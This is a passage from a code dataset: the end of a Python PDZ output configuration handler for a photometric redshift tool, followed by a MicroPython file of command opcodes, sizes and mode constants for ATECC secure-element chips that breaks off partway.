In this case\n # the PDZ is the normalized histogram of the neighbors redshifts.\n if 'reference_redshift' in ref_options:\n ref_z = ref_options['reference_redshift']\n pdz_prov = ocp.TrueRedshiftPdz(len(target_ids), ref_z, 0, 6, 601)\n\n output = ConfigManager.getHandler(OutputHandlerConfig).parseArgs(args)['output_handler']\n output.addColumnProvider(pdz_prov)\n\n pdz_quantiles = args.get('pdz_quantiles', [])\n pdz_mc_samples = args.get('pdz_mc_samples', 0)\n pdf_sampling = ocp.PdfSampling(pdz_prov, quantiles=pdz_quantiles, mc_samples=pdz_mc_samples)\n output.addColumnProvider(pdf_sampling)\n output.addHeaderProvider(pdf_sampling)\n\n # Add point estimates\n if 'pdz_point_estimates' in args:\n output.addColumnProvider(ocp.PdzPointEstimates(pdz_prov, args['pdz_point_estimates']))\n\n output.addExtensionTableProvider(PdzBins(pdz_prov))\n\n def parseArgs(self, args):\n if not self.__added:\n self.__addColumnProvider(args)\n self.__added = True\n return {}\n\n\nConfigManager.addHandler(PdzOutputConfig)","sub_path":"nnpz/config/PdzOutputConfig.py","file_name":"PdzOutputConfig.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468545941","text":"# -*- coding: utf-8 -*-\r\n# pylint: disable=E0401\r\nfrom micropython import const\r\n\r\n\r\n\"\"\" command definitions \"\"\"\r\n# minimum number of bytes in command (from count byte to second CRC byte)\r\nATCA_CMD_SIZE_MIN = const(7)\r\n# maximum size of command packet (Verify)\r\nATCA_CMD_SIZE_MAX = const(4 * 36 + 7)\r\n# status byte for success\r\nCMD_STATUS_SUCCESS = const(0x00)\r\n# status byte after wake-up\r\nCMD_STATUS_WAKEUP = const(0x11)\r\n# command parse error\r\nCMD_STATUS_BYTE_PARSE = const(0x03)\r\n# command ECC error\r\nCMD_STATUS_BYTE_ECC = const(0x05)\r\n# command execution error\r\nCMD_STATUS_BYTE_EXEC = const(0x0F)\r\n# communication error\r\nCMD_STATUS_BYTE_COMM = const(0xFF)\r\n\r\n\r\n\"\"\" name opcodes for ATATECC Commands \"\"\"\r\n# CheckMac command op-code\r\nATCA_CHECKMAC = const(0x28)\r\n# DeriveKey command op-code\r\nATCA_DERIVE_KEY = const(0x1C)\r\n# Info command op-code\r\nATCA_INFO = const(0x30)\r\n# GenDig command op-code\r\nATCA_GENDIG = const(0x15)\r\n# GenKey command op-code\r\nATCA_GENKEY = const(0x40)\r\n# HMAC command op-code\r\nATCA_HMAC = const(0x11)\r\n# Lock command op-code\r\nATCA_LOCK = const(0x17)\r\n# MAC command op-code\r\nATCA_MAC = const(0x08)\r\n# Nonce command op-code\r\nATCA_NONCE = const(0x16)\r\n# Pause command op-code\r\nATCA_PAUSE = const(0x01)\r\n# PrivWrite command op-code\r\nATCA_PRIVWRITE = const(0x46)\r\n# Random command op-code\r\nATCA_RANDOM = const(0x1B)\r\n# Read command op-code\r\nATCA_READ = const(0x02)\r\n# Sign command op-code\r\nATCA_SIGN = const(0x41)\r\n# UpdateExtra command op-code\r\nATCA_UPDATE_EXTRA = const(0x20)\r\n# GenKey command op-code\r\nATCA_VERIFY = const(0x45)\r\n# Write command op-code\r\nATCA_WRITE = const(0x12)\r\n# ECDH command op-code\r\nATCA_ECDH = const(0x43)\r\n# Counter command op-code\r\nATCA_COUNTER = const(0x24)\r\n# SHA command op-code\r\nATCA_SHA = const(0x47)\r\n# AES command op-code\r\nATCA_AES = const(0x51)\r\n# KDF command op-code\r\nATCA_KDF = const(0x56)\r\n# Secure Boot command op-code\r\nATCA_SECUREBOOT = const(0x80)\r\n# Self test command op-code\r\nATCA_SELFTEST = const(0x77)\r\n\r\n\r\n\"\"\" name Definitions of Data and Packet Sizes \"\"\"\r\n# size of a symmetric SHA key\r\nATCA_KEY_SIZE = const(32)\r\n# size of a block\r\nATCA_BLOCK_SIZE 
= const(32)\r\n# size of a word\r\nATCA_WORD_SIZE = const(4)\r\n# size of the public key pad\r\nATCA_PUB_KEY_PAD = const(4)\r\n# number of bytes in the device serial number\r\nATCA_SERIAL_NUM_SIZE = const(9)\r\n# size of response packet containing four bytes of data\r\nATCA_RSP_SIZE_VAL = const(7)\r\n# number of keys\r\nATCA_KEY_COUNT = const(16)\r\n# size of configuration zone\r\nATCA_ECC_CONFIG_SIZE = const(128)\r\n# size of configuration zone\r\nATCA_SHA_CONFIG_SIZE = const(88)\r\n# size of OTP zone\r\nATCA_OTP_SIZE = const(64)\r\n# size of data zone\r\nATCA_DATA_SIZE = const(ATCA_KEY_COUNT * ATCA_KEY_SIZE)\r\n# size of GFM data\r\nATCA_AES_GFM_SIZE = const(ATCA_BLOCK_SIZE)\r\n\r\n# ChipMode byte offset within the configuration zone\r\nATCA_CHIPMODE_OFFSET = const(19)\r\n# ChipMode I2C Address in UserExtraAdd flag\r\nATCA_CHIPMODE_I2C_ADDRESS_FLAG = const(0x01)\r\n# ChipMode TTLenable flag\r\nATCA_CHIPMODE_TTL_ENABLE_FLAG = const(0x02)\r\n# ChipMode watchdog duration mask\r\nATCA_CHIPMODE_WATCHDOG_MASK = const(0x04)\r\n# ChipMode short watchdog (~1.3s)\r\nATCA_CHIPMODE_WATCHDOG_SHORT = const(0x00)\r\n# ChipMode long watchdog (~13s)\r\nATCA_CHIPMODE_WATCHDOG_LONG = const(0x04)\r\n# ChipMode clock divider mask\r\nATCA_CHIPMODE_CLOCK_DIV_MASK = const(0xF8)\r\n# ChipMode clock divider M0\r\nATCA_CHIPMODE_CLOCK_DIV_M0 = const(0x00)\r\n# ChipMode clock divider M1\r\nATCA_CHIPMODE_CLOCK_DIV_M1 = const(0x28)\r\n# ChipMode clock divider M2\r\nATCA_CHIPMODE_CLOCK_DIV_M2 = const(0x68)\r\n\r\n# Number of bytes in the command packet Count\r\nATCA_COUNT_SIZE = const(1)\r\n# Number of bytes in the command packet CRC\r\nATCA_CRC_SIZE = const(2)\r\n# Number of bytes in the command packet\r\nATCA_PACKET_OVERHEAD = const(ATCA_COUNT_SIZE + ATCA_CRC_SIZE)\r\n\r\n# size of a p256 public key\r\nATCA_PUB_KEY_SIZE = const(64)\r\n# size of a p256 private key\r\nATCA_PRIV_KEY_SIZE = const(32)\r\n# size of a p256 signature\r\nATCA_SIG_SIZE = const(64)\r\n# size of a RSA private key\r\nRSA2048_KEY_SIZE = const(256)\r\n\r\n# minimum number of bytes in response\r\nATCA_RSP_SIZE_MIN = const(4)\r\n# size of response packet containing 4 bytes data\r\nATCA_RSP_SIZE_4 = const(7)\r\n# size of response packet containing 72 bytes data\r\nATCA_RSP_SIZE_72 = const(75)\r\n# size of response packet containing 64 bytes data\r\nATCA_RSP_SIZE_64 = const(67)\r\n# size of response packet containing 32 bytes data\r\nATCA_RSP_SIZE_32 = const(35)\r\n# size of response packet containing 16 bytes data\r\nATCA_RSP_SIZE_16 = const(19)\r\n# maximum size of response packet (GenKey and Verify command)\r\nATCA_RSP_SIZE_MAX = const(75)\r\n\r\n# Size of the OutNonce response expected from several commands\r\nOUTNONCE_SIZE = const(32)\r\n\r\n\"\"\" name Definitions for Command Parameter Ranges \"\"\"\r\n# maximum value for key id\r\nATCA_KEY_ID_MAX = const(15)\r\n# maximum value for OTP block\r\nATCA_OTP_BLOCK_MAX = const(1)\r\n\r\n\"\"\" name Definitions for Indexes Common to All Commands \"\"\"\r\n# command packet index for count\r\nATCA_COUNT_IDX = const(0)\r\n# command packet index for op-code\r\nATCA_OPCODE_IDX = const(1)\r\n# command packet index for first parameter\r\nATCA_PARAM1_IDX = const(2)\r\n# command packet index for second parameter\r\nATCA_PARAM2_IDX = const(3)\r\n# command packet index for data load\r\nATCA_DATA_IDX = const(5)\r\n# buffer index of data in response\r\nATCA_RSP_DATA_IDX = const(1)\r\n\r\n\"\"\" name Definitions for Zone and Address Parameters \"\"\"\r\n# Configuration zone\r\nATCA_ZONE_CONFIG = const(0x00)\r\n# OTP 
(One Time Programming) zone\r\nATCA_ZONE_OTP = const(0x01)\r\n# Data zone\r\nATCA_ZONE_DATA = const(0x02)\r\n# Zone mask\r\nATCA_ZONE_MASK = const(0x03)\r\n# Zone bit 6 set: Write is encrypted with an unlocked data zone.\r\nATCA_ZONE_ENCRYPTED = const(0x40)\r\n# Zone bit 7 set: Access 32 bytes, otherwise 4 bytes.\r\nATCA_ZONE_READWRITE_32 = const(0x80)\r\n# Address bits 5 to 7 are 0 for Configuration zone.\r\nATCA_ADDRESS_MASK_CONFIG = const(0x001F)\r\n# Address bits 4 to 7 are 0 for OTP zone.\r\nATCA_ADDRESS_MASK_OTP = const(0x000F)\r\n# Address bit 7 to 15 are always 0.\r\nATCA_ADDRESS_MASK = const(0x007F)\r\n# KeyID when referencing TempKey\r\nATCA_TEMPKEY_KEYID = const(0xFFFF)\r\n\r\n\"\"\" name Definitions for Key types \"\"\"\r\n# B283 NIST ECC key\r\nATCA_B283_KEY_TYPE = const(0)\r\n# K283 NIST ECC key\r\nATCA_K283_KEY_TYPE = const(1)\r\n# P256 NIST ECC key\r\nATCA_P256_KEY_TYPE = const(4)\r\n# AES-128 Key\r\nATCA_AES_KEY_TYPE = const(6)\r\n# SHA key or other data\r\nATCA_SHA_KEY_TYPE = const(7)\r\n\r\n\"\"\" name Definitions for the AES Command \"\"\"\r\n# AES command index for mode\r\nAES_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# AES command index for key id\r\nAES_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# AES command index for input data\r\nAES_INPUT_IDX = const(ATCA_DATA_IDX)\r\n# AES command packet size\r\nAES_COUNT = const(23)\r\n# AES mode bits 3 to 5 are 0\r\nAES_MODE_MASK = const(0xC7)\r\n# AES mode mask for key block field\r\nAES_MODE_KEY_BLOCK_MASK = const(0xC0)\r\n# AES mode operation mask\r\nAES_MODE_OP_MASK = const(0x07)\r\n# AES mode: Encrypt\r\nAES_MODE_ENCRYPT = const(0x00)\r\n# AES mode: Decrypt\r\nAES_MODE_DECRYPT = const(0x01)\r\n# AES mode: GFM calculation\r\nAES_MODE_GFM = const(0x03)\r\n# Bit shift for key block in mode\r\nAES_MODE_KEY_BLOCK_POS = const(6)\r\n# size of AES encrypt/decrypt data\r\nAES_DATA_SIZE = const(16)\r\n# AES command response packet size\r\nAES_RSP_SIZE = const(ATCA_RSP_SIZE_16)\r\n\r\n\"\"\" name Definitions for the CheckMac Command \"\"\"\r\n# CheckMAC command index for mode\r\nCHECKMAC_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# CheckMAC command index for key identifier\r\nCHECKMAC_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# CheckMAC command index for client challenge\r\nCHECKMAC_CLIENT_CHALLENGE_IDX = const(ATCA_DATA_IDX)\r\n# CheckMAC command index for client response\r\nCHECKMAC_CLIENT_RESPONSE_IDX = const(37)\r\n# CheckMAC command index for other data\r\nCHECKMAC_DATA_IDX = const(69)\r\n# CheckMAC command packet size\r\nCHECKMAC_COUNT = const(84)\r\n# CheckMAC mode\t 0: first SHA block from key id\r\nCHECKMAC_MODE_CHALLENGE = const(0x00)\r\n# CheckMAC mode bit 0: second SHA block from TempKey\r\nCHECKMAC_MODE_BLOCK2_TEMPKEY = const(0x01)\r\n# CheckMAC mode bit 1: first SHA block from TempKey\r\nCHECKMAC_MODE_BLOCK1_TEMPKEY = const(0x02)\r\n# CheckMAC mode bit 2: match TempKey.SourceFlag\r\nCHECKMAC_MODE_SOURCE_FLAG_MATCH = const(0x04)\r\n# CheckMAC mode bit 5: include first 64 OTP bits\r\nCHECKMAC_MODE_INCLUDE_OTP_64 = const(0x20)\r\n# CheckMAC mode bits 3, 4, 6, and 7 are 0.\r\nCHECKMAC_MODE_MASK = const(0x27)\r\n# CheckMAC size of client challenge\r\nCHECKMAC_CLIENT_CHALLENGE_SIZE = const(32)\r\n# CheckMAC size of client response\r\nCHECKMAC_CLIENT_RESPONSE_SIZE = const(32)\r\n# CheckMAC size of \"other data\"\r\nCHECKMAC_OTHER_DATA_SIZE = const(13)\r\n# CheckMAC size of client command header size inside \"other data\"\r\nCHECKMAC_CLIENT_COMMAND_SIZE = const(4)\r\n# CheckMAC return value when there is a match\r\nCHECKMAC_CMD_MATCH = 
const(0)\r\n# CheckMAC return value when there is a mismatch\r\nCHECKMAC_CMD_MISMATCH = const(1)\r\n# CheckMAC response packet size\r\nCHECKMAC_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the Counter command \"\"\"\r\nCOUNTER_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Counter command index for mode\r\nCOUNTER_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Counter command index for key id\r\nCOUNTER_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# Counter mode bits 1 to 7 are 0\r\nCOUNTER_MODE_MASK = const(0x01)\r\n# Counter maximum value of the counter\r\nCOUNTER_MAX_VALUE = const(2097151)\r\n# Counter command mode for reading\r\nCOUNTER_MODE_READ = const(0x00)\r\n# Counter command mode for incrementing\r\nCOUNTER_MODE_INCREMENT = const(0x01)\r\n# Counter command response packet size\r\nCOUNTER_RSP_SIZE = const(ATCA_RSP_SIZE_4)\r\n\r\n\r\n\"\"\" name Definitions for the DeriveKey Command \"\"\"\r\n# DeriveKey command index for random bit\r\nDERIVE_KEY_RANDOM_IDX = const(ATCA_PARAM1_IDX)\r\n# DeriveKey command index for target slot\r\nDERIVE_KEY_TARGETKEY_IDX = const(ATCA_PARAM2_IDX)\r\n# DeriveKey command index for optional MAC\r\nDERIVE_KEY_MAC_IDX = const(ATCA_DATA_IDX)\r\n# DeriveKey command packet size without MAC\r\nDERIVE_KEY_COUNT_SMALL = const(ATCA_CMD_SIZE_MIN)\r\n# DeriveKey command mode set to 4 as in datasheet\r\nDERIVE_KEY_MODE = const(0x04)\r\n# DeriveKey command packet size with MAC\r\nDERIVE_KEY_COUNT_LARGE = const(39)\r\n# DeriveKey 1. parameter; has to match TempKey.SourceFlag\r\nDERIVE_KEY_RANDOM_FLAG = const(4)\r\n# DeriveKey MAC size\r\nDERIVE_KEY_MAC_SIZE = const(32)\r\n# DeriveKey response packet size\r\nDERIVE_KEY_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the ECDH Command \"\"\"\r\nECDH_PREFIX_MODE = const(0x00)\r\nECDH_COUNT = const(ATCA_CMD_SIZE_MIN + ATCA_PUB_KEY_SIZE)\r\nECDH_MODE_SOURCE_MASK = const(0x01)\r\nECDH_MODE_SOURCE_EEPROM_SLOT = const(0x00)\r\nECDH_MODE_SOURCE_TEMPKEY = const(0x01)\r\nECDH_MODE_OUTPUT_MASK = const(0x02)\r\nECDH_MODE_OUTPUT_CLEAR = const(0x00)\r\nECDH_MODE_OUTPUT_ENC = const(0x02)\r\nECDH_MODE_COPY_MASK = const(0x0C)\r\nECDH_MODE_COPY_COMPATIBLE = const(0x00)\r\nECDH_MODE_COPY_EEPROM_SLOT = const(0x04)\r\nECDH_MODE_COPY_TEMP_KEY = const(0x08)\r\nECDH_MODE_COPY_OUTPUT_BUFFER = const(0x0C)\r\n# ECDH output data size\r\nECDH_KEY_SIZE = const(ATCA_BLOCK_SIZE)\r\n# ECDH command packet size\r\nECDH_RSP_SIZE = const(ATCA_RSP_SIZE_64)\r\n\r\n\r\n\"\"\" name Definitions for the GenDig Command \"\"\"\r\n# GenDig command index for zone\r\nGENDIG_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# GenDig command index for key id\r\nGENDIG_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# GenDig command index for optional data\r\nGENDIG_DATA_IDX = const(ATCA_DATA_IDX)\r\n# GenDig command packet size without \"other data\"\r\nGENDIG_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# GenDig zone id config. Use KeyID to specify any of the four 256-bit blocks of the Configuration zone.\r\nGENDIG_ZONE_CONFIG = const(0)\r\n# GenDig zone id OTP. Use KeyID to specify either the first or second 256-bit block of the OTP zone.\r\nGENDIG_ZONE_OTP = const(1)\r\n# GenDig zone id data. Use KeyID to specify a slot in the Data zone or a transport key in the hardware array.\r\nGENDIG_ZONE_DATA = const(2)\r\n# GenDig zone id shared nonce. KeyID specifies the location of the input value in the message generation.\r\nGENDIG_ZONE_SHARED_NONCE = const(3)\r\n# GenDig zone id counter. 
KeyID specifies the monotonic counter ID to be included in the message generation.\r\nGENDIG_ZONE_COUNTER = const(4)\r\n# GenDig zone id key config. KeyID specifies the slot for which the configuration information is to be included in the message generation.\r\nGENDIG_ZONE_KEY_CONFIG = const(5)\r\n# GenDig command response packet size\r\nGENDIG_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the GenKey Command \"\"\"\r\n# GenKey command index for mode\r\nGENKEY_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# GenKey command index for key id\r\nGENKEY_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# GenKey command index for other data\r\nGENKEY_DATA_IDX = const(5)\r\n# GenKey command packet size without \"other data\"\r\nGENKEY_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# GenKey command packet size with \"other data\"\r\nGENKEY_COUNT_DATA = const(10)\r\n# GenKey size of \"other data\"\r\nGENKEY_OTHER_DATA_SIZE = const(3)\r\n# GenKey mode bits 0 to 1 and 5 to 7 are 0\r\nGENKEY_MODE_MASK = const(0x1C)\r\n# GenKey mode: private key generation\r\nGENKEY_MODE_PRIVATE = const(0x04)\r\n# GenKey mode: public key calculation\r\nGENKEY_MODE_PUBLIC = const(0x00)\r\n# GenKey mode: PubKey digest will be created after the public key is calculated\r\nGENKEY_MODE_DIGEST = const(0x08)\r\n# GenKey mode: Calculate PubKey digest on the public key in KeyId\r\nGENKEY_MODE_PUBKEY_DIGEST = const(0x10)\r\n# GenKey Create private key and store to tempkey (608 only)\r\nGENKEY_PRIVATE_TO_TEMPKEY = const(0xFFFF)\r\n# GenKey response packet size in Digest mode\r\nGENKEY_RSP_SIZE_SHORT = const(ATCA_RSP_SIZE_MIN)\r\n# GenKey response packet size when returning a public key\r\nGENKEY_RSP_SIZE_LONG = const(ATCA_RSP_SIZE_72)\r\n\r\n\r\n\"\"\" name Definitions for the HMAC Command \"\"\"\r\n# HMAC command index for mode\r\nHMAC_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# HMAC command index for key id\r\nHMAC_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# HMAC command packet size\r\nHMAC_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# HMAC mode bit 2: The value of this bit must match the value in TempKey.SourceFlag or the command will return an error.\r\nHMAC_MODE_FLAG_TK_RAND = const(0x00)\r\n# HMAC mode bit 2: The value of this bit must match the value in TempKey.SourceFlag or the command will return an error.\r\nHMAC_MODE_FLAG_TK_NORAND = const(0x04)\r\n# HMAC mode bit 4: Include the first 88 OTP bits (OTP[0] through OTP[10]) in the message.; otherwise, the corresponding message bits are set to zero. Not applicable for ATECC508A.\r\nHMAC_MODE_FLAG_OTP88 = const(0x10)\r\n# HMAC mode bit 5: Include the first 64 OTP bits (OTP[0] through OTP[7]) in the message.; otherwise, the corresponding message bits are set to zero. If Mode[4] is set, the value of this mode bit is ignored. Not applicable for ATECC508A.\r\nHMAC_MODE_FLAG_OTP64 = const(0x20)\r\n# HMAC mode bit 6: If set, include the 48 bits SN[2:3] and SN[4:7] in the message.; otherwise, the corresponding message bits are set to zero.\r\nHMAC_MODE_FLAG_FULLSN = const(0x40)\r\n# HMAC mode bits 0, 1, 3, and 7 are 0.\r\nHMAC_MODE_MASK = const(0x74)\r\n# HMAC size of digest response\r\nHMAC_DIGEST_SIZE = const(32)\r\n# HMAC command response packet size\r\nHMAC_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Info Command \"\"\"\r\n# Info command index for 1. parameter\r\nINFO_PARAM1_IDX = const(ATCA_PARAM1_IDX)\r\n# Info command index for 2. 
parameter\r\nINFO_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Info command packet size\r\nINFO_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Info mode Revision\r\nINFO_MODE_REVISION = const(0x00)\r\n# Info mode KeyValid\r\nINFO_MODE_KEY_VALID = const(0x01)\r\n# Info mode State\r\nINFO_MODE_STATE = const(0x02)\r\n# Info mode GPIO\r\nINFO_MODE_GPIO = const(0x03)\r\n# Info mode GPIO\r\nINFO_MODE_VOL_KEY_PERMIT = const(0x04)\r\n# Info mode maximum value\r\nINFO_MODE_MAX = const(0x03)\r\n# Info mode is not the state mode.\r\nINFO_NO_STATE = const(0x00)\r\n# Info output state mask\r\nINFO_OUTPUT_STATE_MASK = const(0x01)\r\n# Info driver state mask\r\nINFO_DRIVER_STATE_MASK = const(0x02)\r\n# Info param2 to set the persistent latch state.\r\nINFO_PARAM2_SET_LATCH_STATE = const(0x0002)\r\n# Info param2 to set the persistent latch\r\nINFO_PARAM2_LATCH_SET = const(0x0001)\r\n# Info param2 to clear the persistent latch\r\nINFO_PARAM2_LATCH_CLEAR = const(0x0000)\r\n# Info return size\r\nINFO_SIZE = const(0x04)\r\n# Info command response packet size\r\nINFO_RSP_SIZE = const(ATCA_RSP_SIZE_VAL)\r\n\r\n\r\n\"\"\" name Definitions for the KDF Command \"\"\"\r\n# KDF command index for mode\r\nKDF_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# KDF command index for key id\r\nKDF_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# KDF command index for details\r\nKDF_DETAILS_IDX = const(ATCA_DATA_IDX)\r\n# KDF details (param3) size\r\nKDF_DETAILS_SIZE = const(4)\r\nKDF_MESSAGE_IDX = const(ATCA_DATA_IDX + KDF_DETAILS_SIZE)\r\n\r\n# KDF mode source key mask\r\nKDF_MODE_SOURCE_MASK = const(0x03)\r\n# KDF mode source key in TempKey\r\nKDF_MODE_SOURCE_TEMPKEY = const(0x00)\r\n# KDF mode source key in upper TempKey\r\nKDF_MODE_SOURCE_TEMPKEY_UP = const(0x01)\r\n# KDF mode source key in a slot\r\nKDF_MODE_SOURCE_SLOT = const(0x02)\r\n# KDF mode source key in alternate key buffer\r\nKDF_MODE_SOURCE_ALTKEYBUF = const(0x03)\r\n\r\n# KDF mode target key mask\r\nKDF_MODE_TARGET_MASK = const(0x1C)\r\n# KDF mode target key in TempKey\r\nKDF_MODE_TARGET_TEMPKEY = const(0x00)\r\n# KDF mode target key in upper TempKey\r\nKDF_MODE_TARGET_TEMPKEY_UP = const(0x04)\r\n# KDF mode target key in slot\r\nKDF_MODE_TARGET_SLOT = const(0x08)\r\n# KDF mode target key in alternate key buffer\r\nKDF_MODE_TARGET_ALTKEYBUF = const(0x0C)\r\n# KDF mode target key in output buffer\r\nKDF_MODE_TARGET_OUTPUT = const(0x10)\r\n# KDF mode target key encrypted in output buffer\r\nKDF_MODE_TARGET_OUTPUT_ENC = const(0x14)\r\n\r\n# KDF mode algorithm mask\r\nKDF_MODE_ALG_MASK = const(0x60)\r\n# KDF mode PRF algorithm\r\nKDF_MODE_ALG_PRF = const(0x00)\r\n# KDF mode AES algorithm\r\nKDF_MODE_ALG_AES = const(0x20)\r\n# KDF mode HKDF algorithm\r\nKDF_MODE_ALG_HKDF = const(0x40)\r\n\r\n# KDF details for PRF, source key length mask\r\nKDF_DETAILS_PRF_KEY_LEN_MASK = const(0x00000003)\r\n# KDF details for PRF, source key length is 16 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_16 = const(0x00000000)\r\n# KDF details for PRF, source key length is 32 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_32 = const(0x00000001)\r\n# KDF details for PRF, source key length is 48 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_48 = const(0x00000002)\r\n# KDF details for PRF, source key length is 64 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_64 = const(0x00000003)\r\n\r\n# KDF details for PRF, target length mask\r\nKDF_DETAILS_PRF_TARGET_LEN_MASK = const(0x00000100)\r\n# KDF details for PRF, target length is 32 bytes\r\nKDF_DETAILS_PRF_TARGET_LEN_32 = const(0x00000000)\r\n# KDF details for PRF, target length is 64 bytes\r\nKDF_DETAILS_PRF_TARGET_LEN_64 = 
const(0x00000100)\r\n\r\n# KDF details for PRF, AEAD processing mask\r\nKDF_DETAILS_PRF_AEAD_MASK = const(0x00000600)\r\n# KDF details for PRF, AEAD no processing\r\nKDF_DETAILS_PRF_AEAD_MODE0 = const(0x00000000)\r\n# KDF details for PRF, AEAD First 32 go to target, second 32 go to output buffer\r\nKDF_DETAILS_PRF_AEAD_MODE1 = const(0x00000200)\r\n\r\n# KDF details for AES, key location mask\r\nKDF_DETAILS_AES_KEY_LOC_MASK = const(0x00000003)\r\n\r\n# KDF details for HKDF, message location mask\r\nKDF_DETAILS_HKDF_MSG_LOC_MASK = const(0x00000003)\r\n# KDF details for HKDF, message location in slot\r\nKDF_DETAILS_HKDF_MSG_LOC_SLOT = const(0x00000000)\r\n# KDF details for HKDF, message location in TempKey\r\nKDF_DETAILS_HKDF_MSG_LOC_TEMPKEY = const(0x00000001)\r\n# KDF details for HKDF, message location in input parameter\r\nKDF_DETAILS_HKDF_MSG_LOC_INPUT = const(0x00000002)\r\n# KDF details for HKDF, message location is a special IV function\r\nKDF_DETAILS_HKDF_MSG_LOC_IV = const(0x00000003)\r\n# KDF details for HKDF, key is 32 bytes of zero\r\nKDF_DETAILS_HKDF_ZERO_KEY = const(0x00000004)\r\n\r\n\r\n\"\"\" name Definitions for the Lock Command \"\"\"\r\n# Lock command index for zone\r\nLOCK_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# Lock command index for summary\r\nLOCK_SUMMARY_IDX = const(ATCA_PARAM2_IDX)\r\n# Lock command packet size\r\nLOCK_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Lock zone is Config\r\nLOCK_ZONE_CONFIG = const(0x00)\r\n# Lock zone is OTP or Data\r\nLOCK_ZONE_DATA = const(0x01)\r\n# Lock slot of Data\r\nLOCK_ZONE_DATA_SLOT = const(0x02)\r\n# Lock command: Ignore summary.\r\nLOCK_ZONE_NO_CRC = const(0x80)\r\n# Lock parameter 1 bits 6 are 0.\r\nLOCK_ZONE_MASK = const(0xBF)\r\n# Value indicating an unlocked zone\r\nATCA_UNLOCKED = const(0x55)\r\n# Value indicating a locked zone\r\nATCA_LOCKED = const(0x00)\r\n# Lock command response packet size\r\nLOCK_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the MAC Command \"\"\"\r\n# MAC command index for mode\r\nMAC_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# MAC command index for key id\r\nMAC_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# MAC command index for optional challenge\r\nMAC_CHALLENGE_IDX = const(ATCA_DATA_IDX)\r\n# MAC command packet size without challenge\r\nMAC_COUNT_SHORT = const(ATCA_CMD_SIZE_MIN)\r\n# MAC command packet size with challenge\r\nMAC_COUNT_LONG = const(39)\r\n# MAC mode 0: first SHA block from data slot\r\nMAC_MODE_CHALLENGE = const(0x00)\r\n# MAC mode bit 0: second SHA block from TempKey\r\nMAC_MODE_BLOCK2_TEMPKEY = const(0x01)\r\n# MAC mode bit 1: first SHA block from TempKey\r\nMAC_MODE_BLOCK1_TEMPKEY = const(0x02)\r\n# MAC mode bit 2: match TempKey.SourceFlag\r\nMAC_MODE_SOURCE_FLAG_MATCH = const(0x04)\r\n# MAC mode bit 0: second SHA block from TempKey\r\nMAC_MODE_PTNONCE_TEMPKEY = const(0x06)\r\n# MAC mode bit 0-2: pass-through mode\r\nMAC_MODE_PASSTHROUGH = const(0x07)\r\n# MAC mode bit 4: include first 88 OTP bits\r\nMAC_MODE_INCLUDE_OTP_88 = const(0x10)\r\n# MAC mode bit 5: include first 64 OTP bits\r\nMAC_MODE_INCLUDE_OTP_64 = const(0x20)\r\n# MAC mode bit 6: include serial number\r\nMAC_MODE_INCLUDE_SN = const(0x40)\r\n# MAC size of challenge\r\nMAC_CHALLENGE_SIZE = const(32)\r\n# MAC size of response\r\nMAC_SIZE = const(32)\r\n# MAC mode bits 3 and 7 are 0.\r\nMAC_MODE_MASK = const(0x77)\r\n# MAC command response packet size\r\nMAC_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Nonce Command \"\"\"\r\n# Nonce command index for 
mode\r\nNONCE_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Nonce command index for 2. parameter\r\nNONCE_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Nonce command index for input data\r\nNONCE_INPUT_IDX = const(ATCA_DATA_IDX)\r\n# Nonce command packet size for 20 bytes of NumIn\r\nNONCE_COUNT_SHORT = const(ATCA_CMD_SIZE_MIN + 20)\r\n# Nonce command packet size for 32 bytes of NumIn\r\nNONCE_COUNT_LONG = const(ATCA_CMD_SIZE_MIN + 32)\r\n# Nonce command packet size for 64 bytes of NumIn\r\nNONCE_COUNT_LONG_64 = const(ATCA_CMD_SIZE_MIN + 64)\r\n# Nonce mode bits 2 to 7 are 0.\r\nNONCE_MODE_MASK = const(0x03)\r\n# Nonce mode: update seed\r\nNONCE_MODE_SEED_UPDATE = const(0x00)\r\n# Nonce mode: do not update seed\r\nNONCE_MODE_NO_SEED_UPDATE = const(0x01)\r\n# Nonce mode 2 is invalid.\r\nNONCE_MODE_INVALID = const(0x02)\r\n# Nonce mode: pass-through\r\nNONCE_MODE_PASSTHROUGH = const(0x03)\r\n\r\n# 